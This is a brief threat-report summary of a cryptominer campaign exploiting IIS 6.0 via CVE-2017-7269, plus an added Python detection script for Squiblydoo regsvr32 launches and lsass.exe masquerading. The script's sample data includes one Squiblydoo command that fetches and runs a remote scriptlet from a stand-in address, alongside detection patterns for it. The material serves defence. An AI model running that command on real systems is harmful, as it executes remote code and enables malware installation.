F5 researchers recently noticed a new campaign exploiting a vulnerability in Microsoft Internet Information Services (IIS) 6.0 servers (CVE-2017-7269) in order to mine Electroneum crypto-currency. Last year, ESET security researchers reported that the same IIS vulnerability was abused to mine Monero.
[...]a 32bit version of a crypto-currency miner called XMRig (2.5.2)[...]
The campaign targets Windows IIS 6.0 servers through a vulnerability (CVE-2017-7269) that was publicly disclosed over a year ago.
The "Squiblydoo" technique is used to download and execute the malware.
The author named the malware file "Isass.eXe", likely to camouflage it as the legitimate lsass.exe process.
The malware hosting server resides in Beijing, China, inside China Unicom's network.
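
A defender-side check for the two behaviours named above, as an added example that is not part of the F5 report: it flags regsvr32 registering a remote scriptlet through scrobj.dll (the publicly documented command-line shape of Squiblydoo) and any lsass.exe look-alike image that is not the one in System32. The event tuples, function names and the 203.0.113.10 address are constructed for illustration.

```python
import re
from ntpath import basename, dirname

# Constructed process-creation events (image path, command line); not from the report.
SAMPLE_EVENTS = [
    (r"C:\WINDOWS\system32\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"),
    (r"C:\WINDOWS\system32\regsvr32.exe", r"regsvr32 /s C:\WINDOWS\system32\msxml3.dll"),
    (r"C:\WINDOWS\Temp\lsass.eXe", "lsass.eXe"),
    (r"C:\WINDOWS\Temp\Isass.eXe", "Isass.eXe"),
    (r"C:\WINDOWS\system32\lsass.exe", r"C:\WINDOWS\system32\lsass.exe"),
]

# /i: (or -i:) pointing at an http(s) URL means the scriptlet is fetched remotely.
REMOTE_SCRIPTLET = re.compile(r'[/-]i:\s*"?https?://', re.IGNORECASE)
# Names that read as lsass.exe once case is ignored or 'I' stands in for 'l'.
LSASS_LOOKALIKES = {"lsass.exe", "isass.exe"}
SYSTEM32 = r"c:\windows\system32"

def is_squiblydoo(image, cmdline):
    """regsvr32 loading scrobj.dll with a remote /i: scriptlet URL."""
    return (basename(image).lower() == "regsvr32.exe"
            and REMOTE_SCRIPTLET.search(cmdline) is not None
            and "scrobj" in cmdline.lower())

def is_lsass_masquerade(image):
    """A name that looks like lsass.exe but is not System32's own lsass.exe."""
    name = basename(image).lower()
    if name not in LSASS_LOOKALIKES:
        return False
    genuine = name == "lsass.exe" and dirname(image).lower() == SYSTEM32
    return not genuine

def triage(events):
    """Return (image, reason) for every event that trips a check."""
    hits = []
    for image, cmdline in events:
        if is_squiblydoo(image, cmdline):
            hits.append((image, "squiblydoo"))
        if is_lsass_masquerade(image):
            hits.append((image, "lsass-masquerade"))
    return hits

if __name__ == "__main__":
    for image, reason in triage(SAMPLE_EVENTS):
        print(f"{reason:18} {image}")
```

The same two predicates can be run over exported process-creation records (for example Windows Security event 4688 with command-line auditing enabled) by mapping each record to an `(image, cmdline)` pair.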